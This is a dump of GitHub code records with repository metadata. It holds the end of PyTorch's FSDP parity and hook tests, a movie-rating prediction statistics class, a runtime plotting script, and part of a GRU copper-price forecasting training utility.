\"cpu_offload,sharding_strategy\"\ncpu_offload_config = [CPUOffload(offload_params=True), CPUOffload(offload_params=False)]\nsharding_strategy_config = [\n None,\n ShardingStrategy.SHARD_GRAD_OP,\n ShardingStrategy.NO_SHARD,\n]\nconfigs = list(itertools.product(cpu_offload_config, sharding_strategy_config))\ntest_name_mapping = {\n str(CPUOffload(offload_params=True)): \"offload_true\",\n str(CPUOffload(offload_params=False)): \"offload_false\",\n str(ShardingStrategy.SHARD_GRAD_OP): \"shard_grad_op\",\n str(ShardingStrategy.NO_SHARD): \"no_shard\",\n}\n\nsubtest_name = functools.partial(subtest_name, test_name_mapping)\n\n\nclass TestParityWithDDP(FSDPTest):\n \"\"\"\n Compare losses and parameter values after several updates when using\n PyTorch DDP vs. FullyShardedDataParallel.\n \"\"\"\n\n def _get_cuda_init_modes(self, cpu_offload: CPUOffload) -> List[CUDAInitMode]:\n modes = [\n CUDAInitMode.CUDA_AFTER,\n CUDAInitMode.CUDA_BEFORE,\n ]\n # Note that CUDAInitMode.CUDA_NEVER works currently only with CPU\n # offload as we explicitly bring the param back to CUDA device. In\n # general, it will not work since we try to all_gather p.data which is\n # on CPU but NCCL only supports GPU.\n if cpu_offload.offload_params:\n modes.append(CUDAInitMode.CUDA_NEVER)\n\n return modes\n\n def _get_subtest_config(self, cpu_offload: CPUOffload) -> Dict[str, List[Any]]:\n \"\"\"Returns a subtest configuration that subtests CUDA initialization\n modes and prefetching settings together.\"\"\"\n return {\n \"cuda_init_mode\": self._get_cuda_init_modes(cpu_offload),\n \"backward_prefetch\": [\n None,\n BackwardPrefetch.BACKWARD_PRE,\n BackwardPrefetch.BACKWARD_POST,\n ],\n \"forward_prefetch\": [False, True],\n \"use_orig_params\": [False, True],\n }\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_nested_wrapped_model(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModule,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_nested_wrapped_model_single_iteration_mixed_precision(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n mixed_precision = MixedPrecision(\n param_dtype=torch.float16,\n buffer_dtype=torch.float16,\n reduce_dtype=torch.float16,\n )\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModule,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n num_iters=1,\n mixed_precision=mixed_precision,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_nested_always_wrap_model(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n AlwaysWrapNestedWrappedModule,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_transformer(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n TransformerWithSharedParams,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_delayed_optim_step(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n \"\"\"Tests the FSDP forward, backward, and optimizer step runtime by\n using a model with a long CUDA delay after the loss computation/before\n the optimizer step to exercise the internal CUDA stream usage in that\n the forward pass all-gathers do not start until after the optimizer\n step completes.\"\"\"\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModuleWithDelay,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n init_kwargs={\"delay_after_loss_ms\": 250},\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_delayed_reduce_scatter(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n \"\"\"Tests the FSDP forward, backward, and optimizer step runtime by\n using a model with a long CUDA delay before the gradient reduce-scatter\n to exercise the internal CUDA stream usage in that the backward pass\n waits for those reductions to finish.\"\"\"\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModuleWithDelay,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n init_kwargs={\"delay_before_reduction_ms\": 250},\n )\n\n def _dummy_ddp_fn(self, model):\n # `MixtureOfExperts`` implements custom gradient reduction logic, so\n # the reference behavior should follow that logic instead of DDP\n return DummyDDP(model)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_mixture_of_experts(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n MixtureOfExperts,\n FSDPInitMode.RECURSIVE,\n ref_init_fn=self._dummy_ddp_fn,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_mixture_of_experts_with_delay_before_free(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n MixtureOfExperts,\n FSDPInitMode.RECURSIVE,\n ref_init_fn=self._dummy_ddp_fn,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n init_kwargs={\"delay_before_free_ms\": 250},\n )\n\n\nclass TestParamInit(FSDPTest):\n @skip_if_lt_x_gpu(2)\n @parametrize(\"mixed_precision\", [True, False])\n def test_param_change_after_init(self, mixed_precision):\n \"\"\"\n Tests that changing FSDP model parameter values in-place after FSDP\n initialization persist.\n \"\"\"\n # Establish reference behavior\n fsdp_kwargs = {}\n if mixed_precision:\n fsdp_kwargs[\"mixed_precision\"] = MixedPrecision()\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n deterministic=True,\n )\n input = fsdp_model.module.get_input(torch.device(\"cuda\"))\n ref_output = fsdp_model(*input)\n # Initialize the same model but change its first parameter value\n # in-place after FSDP initialization\n new_fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n deterministic=True,\n )\n first_param = next(new_fsdp_model.parameters())\n nn.init.normal_(first_param.data)\n new_output = new_fsdp_model(*input)\n self.assertNotEqual(\n ref_output,\n new_output,\n msg=\"new_output did not reflect change to param after init\",\n )\n\n\nclass TestHooks(FSDPTest):\n @skip_if_lt_x_gpu(2)\n @parametrize(\"cuda_first\", [False, True])\n def test_pre_backward_hook_registration(self, cuda_first: bool):\n \"\"\"Tests that FSDP pre-backward hooks are registered on forward pass\n outputs.\"\"\"\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_BEFORE if cuda_first else CUDAInitMode.CUDA_AFTER,\n )\n self._test_pre_backward_hook_registration(fsdp_model)\n\n @skip_if_lt_x_gpu(2)\n def test_pre_backward_hook_registration_after_state_dict(self):\n \"\"\"Tests that FSDP pre-backward hooks are registered on forward pass\n outputs after saving and loading the model from a checkpoint.\"\"\"\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n )\n self._train_for_several_steps(fsdp_model, num_steps=2, autocast=False)\n state_dict = fsdp_model.state_dict()\n fsdp_model.load_state_dict(state_dict)\n self._test_pre_backward_hook_registration(fsdp_model)\n\n def _test_pre_backward_hook_registration(self, model):\n optim = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9)\n optim.zero_grad()\n # Inputs always cuda, as computation happens on CUDA device only\n input = model.module.get_input(torch.device(\"cuda\"))\n output = model(*input)\n # this is pre-bwd hook\n self.assertEqual(len(output._backward_hooks), 1)\n loss = model.module.get_loss(input, output).cuda()\n loss.backward()\n # It doesn't get removed\n self.assertEqual(len(output._backward_hooks), 1)\n optim.step()\n self.assertEqual(len(output._backward_hooks), 1)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(\"cuda_first\", [False, True])\n @parametrize(\"mixed_precision\", [True, False])\n def test_register_functions_called(self, cuda_first: bool, mixed_precision: bool):\n \"\"\"Tests that ``_register_{pre|post}_backward_hooks()`` are called\n during the FSDP forward.\"\"\"\n fsdp_kwargs = {}\n if mixed_precision:\n fsdp_kwargs[\"mixed_precision\"] = MixedPrecision()\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_BEFORE if cuda_first else CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n )\n input = fsdp_model.module.get_input(torch.device(\"cuda\"))\n\n # Since `_register_pre_backward_hooks()` modifies the forward output,\n # we cannot directly mock it. We implement our own counter instead.\n orig_register_pre_backward_hooks = (\n torch.distributed.fsdp._runtime_utils._register_pre_backward_hooks\n )\n register_pre_backward_hooks_call_count = 0\n\n def _register_pre_backward_hooks_with_count(*args, **kwargs):\n nonlocal register_pre_backward_hooks_call_count\n register_pre_backward_hooks_call_count += 1\n return orig_register_pre_backward_hooks(*args, **kwargs)\n\n with mock.patch(\n \"torch.distributed.fsdp._runtime_utils._register_pre_backward_hooks\",\n _register_pre_backward_hooks_with_count,\n ), mock.patch(\n \"torch.distributed.fsdp._runtime_utils._register_post_backward_hook\"\n ) as register_post_bwd_mock:\n self.assertEqual(register_pre_backward_hooks_call_count, 0)\n self.assertFalse(register_post_bwd_mock.called)\n fsdp_model(*input)\n self.assertTrue(register_pre_backward_hooks_call_count > 0)\n self.assertTrue(register_post_bwd_mock.called)\n\n\nclass TestNoGrad(FSDPTest):\n @skip_if_lt_x_gpu(2)\n @parametrize(\"mixed_precision\", [True, False])\n def test_transformer_no_grad(self, mixed_precision):\n \"\"\"Tests that for an FSDP-wrapped transformer model with shared\n parameters, after training for one iteration, running a forward pass in\n ``eval()`` mode gives the same output as running a forward pass in\n ``torch.no_grad()``.\"\"\"\n fsdp_kwargs = {}\n if mixed_precision:\n fsdp_kwargs[\"mixed_precision\"] = MixedPrecision(\n param_dtype=torch.float16,\n reduce_dtype=torch.float16,\n buffer_dtype=torch.float16,\n )\n else:\n fsdp_kwargs[\"mixed_precision\"] = None\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n )\n self._train_for_several_steps(\n fsdp_model,\n num_steps=1,\n autocast=False,\n mixed_precision=fsdp_kwargs[\"mixed_precision\"],\n )\n input = fsdp_model.module.get_input(torch.device(\"cuda\"))\n # Run a forward in eval mode\n fsdp_model.eval()\n ref_output = fsdp_model(*input)\n # Run a forward in `no_grad()` and compare\n with torch.no_grad():\n no_grad_output = fsdp_model(*input)\n self.assertEqual(ref_output, no_grad_output)\n\n\nclass TestAutograd(FSDPTest):\n @skip_if_lt_x_gpu(2)\n def test_unshard_params_as_tensors(\n self,\n ):\n \"\"\"\n Tests that FSDP always unshards the logical parameters as ``Tensor``\n views during forward and backward computation even when forward and/or\n backward prefetching.\n \"\"\"\n self.run_subtests(\n {\n \"sharding_strategy\": [\n ShardingStrategy.FULL_SHARD,\n ShardingStrategy.SHARD_GRAD_OP\n # Skip testing `NO_SHARD` since it doubly uses\n # `_use_unsharded_views()` for sharded views. Testing\n # `FULL_SHARD` and `SHARD_GRAD_OP` provides good confidence\n # that the `as_params` logic is correct.\n ],\n \"use_orig_params\": [False, True],\n \"forward_prefetch\": [False, True],\n \"backward_prefetch\": [\n BackwardPrefetch.BACKWARD_PRE,\n BackwardPrefetch.BACKWARD_POST,\n None,\n ],\n },\n self._test_unshard_params_as_tensors,\n )\n\n def _test_unshard_params_as_tensors(\n self,\n sharding_strategy: ShardingStrategy,\n use_orig_params: bool,\n forward_prefetch: bool,\n backward_prefetch: Optional[BackwardPrefetch],\n ):\n orig_use_unsharded_views = FlatParamHandle._use_unsharded_views\n\n def _use_unsharded_views_assert_as_tensors(\n self: FlatParamHandle, as_params: bool\n ) -> None:\n _p_assert(\n not as_params, \"Expects to use Tensor views but using parameter views\"\n )\n return orig_use_unsharded_views(self, as_params)\n\n fsdp_kwargs = {\n \"sharding_strategy\": sharding_strategy,\n \"use_orig_params\": use_orig_params,\n \"forward_prefetch\": forward_prefetch,\n \"backward_prefetch\": backward_prefetch,\n \"auto_wrap_policy\": ModuleWrapPolicy({nn.Linear}),\n }\n device = torch.device(\"cuda\")\n # Define a model with enough FSDP instances to exercise prefetching\n NUM_LINEARS = 5\n model = nn.Sequential(\n *[nn.Linear(3, 3, device=device) for _ in range(NUM_LINEARS)]\n )\n fsdp_model = FSDP(model, **fsdp_kwargs)\n self.assertEqual(len(list(FSDP.fsdp_modules(fsdp_model))), NUM_LINEARS + 1)\n for _ in range(3):\n inp = torch.randn((2, 3), device=device)\n with self._patch_use_unsharded_views(\n _use_unsharded_views_assert_as_tensors\n ):\n loss = fsdp_model(inp).sum()\n loss.backward()\n\n @contextlib.contextmanager\n def _patch_use_unsharded_views(self, new_use_unsharded_views: Callable):\n orig_use_unsharded_views = FlatParamHandle._use_unsharded_views\n FlatParamHandle._use_unsharded_views = new_use_unsharded_views\n try:\n yield\n finally:\n FlatParamHandle._use_unsharded_views = orig_use_unsharded_views\n\n\ninstantiate_parametrized_tests(TestHooks)\ninstantiate_parametrized_tests(TestParityWithDDP)\ninstantiate_parametrized_tests(TestNoGrad)\ninstantiate_parametrized_tests(TestParamInit)\n\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/fsdp/test_fsdp_core.py","file_name":"test_fsdp_core.py","file_ext":"py","file_size_in_byte":18790,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11277684336","text":"import json\nfrom utilities.SaveLoadJson import SaveLoadJson\n\nclass Stats:\n filename = 'ratings.txt'\n filename2 = 'parameters.txt'\n dataFile = 'dataStore.txt'\n\n @staticmethod\n #Adjusts weights based on if ratings exists so they add up to 1\n def adjust(weights, newWeights, avgHold):\n total = 0\n for key, value in weights.items():\n if avgHold[key][0] > 0.0:\n total += value\n total = 1 / total\n for key, value in weights.items():\n newWeights[key] = total*value\n\n @staticmethod\n def analyze():\n\n #People to look at\n works = [\"Actors\",\"Directors\",\"Writers\",\"Producers\"]\n #Averages to look at\n values = [\"Genres\", \"Average\",\"Company\",\"Year\"]\n\n newWeights = {}\n\n avgHold = {\"Actors\":[0.0,0,0.0],\n \"Directors\":[0.0,0,0.0],\n \"Writers\":[0.0,0,0.0],\n \"Producers\":[0.0,0,0.0],\n \"Genres\":[0.0,0,0.0],\n \"Company\":[0.0,0,0.0],\n \"Year\":[0.0,0,0.0],\n \"Average\":[0.0,0,0.0],\n \"Max\":[10.0,1,0.0],\n \"Min\":[0.0001,1,0.0]\n }\n\n #Output format - what we're sending back to the user\n result = {\"Name\":\"\",\n \"Average\":\"\",\n \"Actual\":\"\",\n \"Error\":\"\",\n \"Id\":\"\",\n \"Imdb_id\":\"\"}\n \n print(\"Doing math!\")\n factors = SaveLoadJson.load(Stats.filename) #Load factors\n parameters = SaveLoadJson.load(Stats.filename2) #Load parameters\n data = SaveLoadJson.load(Stats.dataFile) #Load data\n\n weights = data[\"weights\"] #Copy weights from Json\n\n totalQueries = 3 #Required to find name, get movie, and get credits\n observed = 0.0 #Final average\n\n #Moving through the data-------------------------------\n #Stuff with works\n for key in works:\n for person in factors[key]:\n totalQueries += 1\n for item in person[\"works\"]:\n if item[\"rating\"] != \"0\":\n avgHold[key][0] += float(item[\"rating\"])\n avgHold[key][1] += float(person[\"total_works\"])\n\n #Stuff with averages\n for key in values:\n avgHold[key][0] = sum(factors[key])\n avgHold[key][1] = len(factors[key])\n\n Stats.adjust(weights, newWeights, avgHold)\n\n for key, value in avgHold.items():\n if(value[0] > 0):\n avgHold[key][0] = value[0]/value[1]\n avgHold[key][2] = (value[0])*newWeights[key]\n observed += avgHold[key][2]\n\n #Modify the weights for a better fit -------------------\n if float(parameters[\"Rating\"]) != 0:\n modifier = 0.1\n if data[\"totalAdjusts\"] > 10000:\n modifier = 0.00001\n elif data[\"totalAdjusts\"] > 1000:\n modifier = 0.0001\n elif data[\"totalAdjusts\"] > 100:\n modifier = 0.001\n elif data[\"totalAdjusts\"] > 10:\n modifier = 0.01\n\n for key, value in avgHold.items():\n if value[0] != 0 and value[0] != float(parameters[\"Rating\"]):\n if value[0] > observed and float(parameters[\"Rating\"]) > observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]+modifier))\n if value[0] < observed and float(parameters[\"Rating\"]) < observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]+modifier))\n if value[0] > observed and float(parameters[\"Rating\"]) < observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]-modifier))\n if value[0] < observed and float(parameters[\"Rating\"]) > observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]-modifier))\n\n #Formatting results --------------------------------------\n #Percent error\n percentError = 0\n if float(parameters[\"Rating\"]) != 0:\n percentError = (abs(float(parameters[\"Rating\"])-observed)/float(parameters[\"Rating\"]))*100\n\n result[\"Error\"]=str(format(percentError,'.2f'))\n result[\"Actual\"]=str(parameters[\"Rating\"])\n result[\"Average\"]=str(format(observed, '.1f'))\n result[\"Name\"]=str(parameters[\"Title\"])\n result[\"Id\"]=str(parameters[\"Id\"])\n result[\"Imdb_id\"]=str(parameters[\"Imdb_id\"])\n \n #Save data to file --------------------------------------\n data[\"weights\"] = weights\n data[\"totalQueries\"] += totalQueries\n data[\"totalAdjusts\"] += 1\n if len(data[\"ratings\"]) > data[\"totalAdjusts\"]/2 or len(data[\"ratings\"]) > 1000:\n data[\"ratings\"].pop(0)\n data[\"ratings\"].append(json.dumps(result))\n SaveLoadJson.save(Stats.dataFile, data)\n\n return result\n","repo_name":"UCSB-dataScience-ProjectGroup/movie_rating_prediction","sub_path":"src/models/Stats.py","file_name":"Stats.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13443769090","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nimport matplotlib.style as style\nstyle.use('ggplot')\n\nfrom matplotlib import rc\nrc({'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\ndef read_out(filepath):\n seq_runtimes = list()\n top_down_runtimes = list()\n with open(filepath, \"r\") as f:\n lines = f.readlines()\n for line in lines:\n line_split = line.split(\" \")\n data = [int(float(x)) for x in line_split]\n seq_runtimes.append(data[0])\n top_down_runtimes.append(data[1])\n print(data)\n seq_runtimes = np.array(seq_runtimes)\n top_down_runtimes = np.array(top_down_runtimes)\n # print(\"Average Top Down Runtime:\", np.mean(top_down_runtimes)/1e6, \"ms\")\n # print(\"Average Bottom Up Runtime:\", np.mean(bottom_up_runtimes)/1e6, \"ms\")\n # print(\"Average Hybrid Runtime:\", np.mean(hybrid_runtimes)/1e6, \"ms\")\n return np.mean(seq_runtimes), np.mean(top_down_runtimes)\n\ndef plot_runtimes(prefix):\n ts = np.arange(1,9)\n avg_seq_runtimes = [590438225,590330997,590942967,590062792,589954669,589243878,591409536,592531934]\n avg_par_runtimes = [591566717,309022344,219178613,176232405,156674935,144091538,134204101,131053753]\n avg_seq_runtimes = list(map(lambda x : x/1e6, avg_seq_runtimes))\n avg_par_runtimes = list(map(lambda x : x/1e6, avg_par_runtimes))\n # for t in ts:\n # avg_seq_runtime, avg_top_down_par_runtime = read_out(os.path.join(prefix, \"le_lists_powerlaw2_\" + str(t) + \".txt\"))\n # avg_seq_runtimes.append(avg_seq_runtime)\n # avg_top_down_par_runtimes.append(avg_top_down_par_runtime)\n # plt.plot(ts, avg_seq_runtimes)\n plt.plot(ts, avg_seq_runtimes)\n plt.plot(ts, avg_par_runtimes)\n plt.xlabel(\"Number of Threads\")\n plt.ylabel(\"Time (ms)\")\n plt.legend([\"Sequential\", \"Parallel\"])\n plt.title(\"LE-Lists Runtimes on Random Powerlaw Graphs ($|V| = 20000$, $\\mu_{deg} = 10$, $p = 0.25$)\", fontsize=12)\n plt.savefig(\"le_lists_plots/le_lists_runtimes.png\", dpi=500)\n plt.show()\n\nprefix = \"../results/le_lists/\"\nplot_runtimes(prefix)","repo_name":"ptartan21/15418_Project","sub_path":"src/plot/le_lists_plot.py","file_name":"le_lists_plot.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"69934812394","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\nUtility used by the Network class to actually train.\n\nBased on:\n https://github.com/fchollet/keras/blob/master/examples/mnist_mlp.py\n\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom tensorflow import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, GRU, Flatten\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import EarlyStopping\nfrom tensorflow.keras.metrics import Metric\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\ngpu_options = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=0.3)\nsess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(gpu_options=gpu_options))\ntf.compat.v1.keras.backend.set_session(sess)\n\n\n# In[3]:\n\n\nnp.set_printoptions(suppress=True)\n\n\n# In[4]:\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nsc = MinMaxScaler(feature_range = (0, 1))\n\n\n# In[5]:\n\n\ndef read(path):\n return pd.read_csv(path)\n\n\n# In[6]:\n\n\ndef buildTrain(train, pastWeek, futureWeek=1, defaultWeek=1):\n X_train, Y_train = [], []\n for i in range(train.shape[0]-futureWeek-pastWeek):\n \n X = np.array(train.iloc[i:i+pastWeek,:])\n \n X_train.append(X.reshape(X.size))\n Y_train.append(np.array(train.iloc[i+pastWeek:i+pastWeek+futureWeek][\"CCSP\"]))\n return (np.array(X_train), np.array(Y_train))\n\n\n# In[7]:\n\n\ndef get_data(timeLag):\n \n ## Read weekly copper price data\n path = \"WeeklyFinalData.csv\"\n data = read(path)\n \n date = data[\"Date\"]\n data.drop(\"Date\", axis=1, inplace=True)\n \n ## Add time lag (pastWeek=4, futureWeek=1)\n x_data, y_data = buildTrain(data, timeLag)\n \n ## Data split\n x_train = x_data[0:int(x_data.shape[0]*0.8)]\n x_test = x_data[int(x_data.shape[0]*0.8):]\n \n y_train = y_data[0:int(y_data.shape[0]*0.8)]\n y_test = y_data[int(y_data.shape[0]*0.8):]\n \n ## Other information\n nb_output = 1\n \n return (nb_output, x_train, x_test, y_train, y_test)\n\n\n# In[18]:\n\n\n# path = \"WeeklyFinalData.csv\"\n# data = read(path)\n\n# date = data[\"Date\"]\n# data.drop(\"Date\", axis=1, inplace=True)\n\n# ## Add time lag (pastWeek=4, futureWeek=1)\n# x_data, y_data = buildTrain(data, 30)\n# print(x_data.shape)\n# # print(x_data.reshape(-1,3,15)[0])\n# # print(y_data[0])\n# # print(x_data.shape, y_data.shape)\n\n\n# In[9]:\n\n\ndef compile_model(nb_neurons, nb_layers, optimizer, nb_output, input_shape):\n \"\"\"Compile a sequential model.\n\n Args:\n network (dict): the parameters of the network\n\n Returns:\n a compiled network.\n\n \"\"\"\n # Get our network parameters.\n keras.backend.clear_session()\n model = Sequential()\n\n # Add each layer.\n for i in range(nb_layers):\n\n # Need input shape for first layer.\n if i == 0:\n model.add(GRU(units = nb_neurons, batch_input_shape=input_shape, return_sequences=True))\n if i==(nb_layers-1):\n model.add(GRU(units = nb_neurons, batch_input_shape=input_shape))\n else:\n model.add(GRU(units = nb_neurons, return_sequences=True))\n\n# model.add(Dropout(0.2)) # hard-coded dropout\n\n # Output layer.\n# model.add(Flatten())\n model.add(Dense(units = nb_output))\n\n# print(model.summary())\n model.compile(loss='mean_squared_error', optimizer=optimizer)\n\n \n return model\n\n\n# In[10]:\n\n\ndef train_and_score(Network):\n \"\"\"Train the model, return test loss.\n\n Args:\n network (dict): the parameters of the network\n dataset (str): Dataset to use for training/evaluating\n\n \"\"\"\n\n ## The moving window mechanism for incremental learning (# of batch)\n batch_size = Network.network['batch_size']\n \n ## The time lag as forecasting variable (# of sequence)\n window_size = Network.network['window_size']\n \n ## The hyperparameter for GRU\n nb_neurons = Network.network['nb_neurons']\n nb_layers = Network.network['nb_layers']\n optimizer = Network.network['optimizer']\n\n ## Get the training data from help method: get_data(window_size)\n nb_output, x_train, x_test, y_train, y_test = get_data(window_size)\n \n ## The number of forecasting variable (# of variable)\n nb_input_factor = 15\n \n ## Data transformation\n x_train_scaled = sc.fit_transform(x_train).reshape(-1,window_size,nb_input_factor)\n x_test_scaled = sc.transform(x_test).reshape(-1,window_size,nb_input_factor)\n y_train_scaled = sc.fit_transform(y_train)\n \n ## Define the GRU input_shape and compile the model\n input_shape = (None, window_size, nb_input_factor)\n model = compile_model(nb_neurons, nb_layers, optimizer, nb_output, input_shape)\n \n ## The volume of training data\n nb_data = x_train_scaled.shape[0]\n \n ## The performance_indicator list to store loss and accuracy\n performance_indicator = pd.DataFrame(columns=[\"Loss_train\",\"Accuracy_train\",\"Loss_test\",\"Accuracy_test\"])\n \n ## The times of training\n epoch = 300\n \n ## The training step of GRU\n for e in range(epoch):\n \n minimum_loss = np.inf\n current_times = 0\n\n if (current_times > 5):\n\n model.load_weights(\"model_weight.h5\")\n Network.set_model(model)\n # Network.set_weights(model.get_weights())\n break\n\n else:\n\n for i in range(0, nb_data-batch_size+1):\n\n end = i + batch_size\n\n if end < nb_data:\n x = x_train_scaled[i:end]\n y = y_train_scaled[i:end]\n# print(x.shape,y.shape)\n model.train_on_batch(x, y)\n\n else:\n x = x_train_scaled[i:nb_data]\n y = y_train_scaled[i:nb_data]\n# print(i)\n# print(x.shape, y.shape)\n model.train_on_batch(x, y)\n\n ## To calculate the forecasting performance\n y_pred_train = sc.inverse_transform(model.predict(x_train_scaled))\n loss_train = tf.reduce_mean(tf.square(y_train - y_pred_train)).numpy()\n accuracy_train = tf.reduce_sum(tf.cast(tf.less_equal(tf.abs(y_train - y_pred_train), 1000), dtype = tf.float32)).numpy()/y_train.shape[0]\n\n y_pred_test = sc.inverse_transform(model.predict(x_test_scaled))\n loss_test = tf.reduce_mean(tf.square(y_test - y_pred_test)).numpy()\n accuracy_test = tf.reduce_sum(tf.cast(tf.less_equal(tf.abs(y_test - y_pred_test), 1000), dtype = tf.float32)).numpy()/y_test.shape[0]\n\n epoch_performance = pd.DataFrame({\n \"Loss_train\":loss_train,\n \"Accuracy_train\":accuracy_train,\n \"Loss_test\":loss_test,\n \"Accuracy_test\":accuracy_test\n },index=[0])\n\n performance_indicator = performance_indicator.append(epoch_performance,ignore_index=True)\n print(\"Epoch: %d, Loss: %.2f, Accuracy_train: %.2f%%, Accuracy_test: %.2f%%\"%(e,loss_train,accuracy_train*100,accuracy_test*100))\n print(\"-\"*50)\n\n\n if(loss_train <= minimum_loss):\n minimum_loss = loss_train\n current_times=0\n model.save_weights(\"model_weight.h5\")\n Network.set_model(model)\n\n else:\n current_times += 1\n if (e>=epoch-1):\n Network.set_model(model)\n \n Network.performance_indicator = performance_indicator\n \n \n y_pred_test = sc.inverse_transform(model.predict(x_test_scaled))\n loss_test = tf.reduce_mean(tf.square(y_test - y_pred_test)).numpy()\n accuracy_test = tf.reduce_sum(tf.cast(tf.less_equal(tf.abs(y_test - y_pred_test), 1000), dtype = tf.float32)).numpy()/y_test.shape[0]\n\n Network.y_true = y_test\n Network.y_predict = y_pred_test\n \n return accuracy_test \n\n\n# In[11]:\n\n\n# \"\"\"Class that represents the network to be evolved.\"\"\"\n# import random\n# import logging\n\n\n# In[12]:\n\n\n# class Network():\n# \"\"\"Represent a network and let us operate on it.\n\n# Currently only works for an MLP.\n# \"\"\"\n\n# def __init__(self, nn_param_choices=None):\n# \"\"\"Initialize our network.\n\n# Args:\n# nn_param_choices (dict): Parameters for the network, includes:\n# 'window_size':[i for i in range(1,50)]\n# 'nb_neurons': [i for i in range(3, 41, 1)],\n# 'nb_layers': [i for i in range(1,11)],\n# 'batch_size':[i for i in range(1,21)],\n# 'epoch':[i for i in range(10,501)],\n# 'optimizer': ['rmsprop', 'adam', 'sgd', 'adagrad',\n# 'adadelta', 'adamax', 'nadam','ftrl'],\n# \"\"\"\n# self.accuracy = 0.\n# self.nn_param_choices = nn_param_choices\n# self.network = {} # (dic): represents MLP network parameters\n# self.model = None\n# self.performance_indicator = None\n# self.y_true = None\n# self.y_predict = None\n \n# def create_random(self):\n# \"\"\"Create a random network.\"\"\"\n# for key in self.nn_param_choices:\n# self.network[key] = 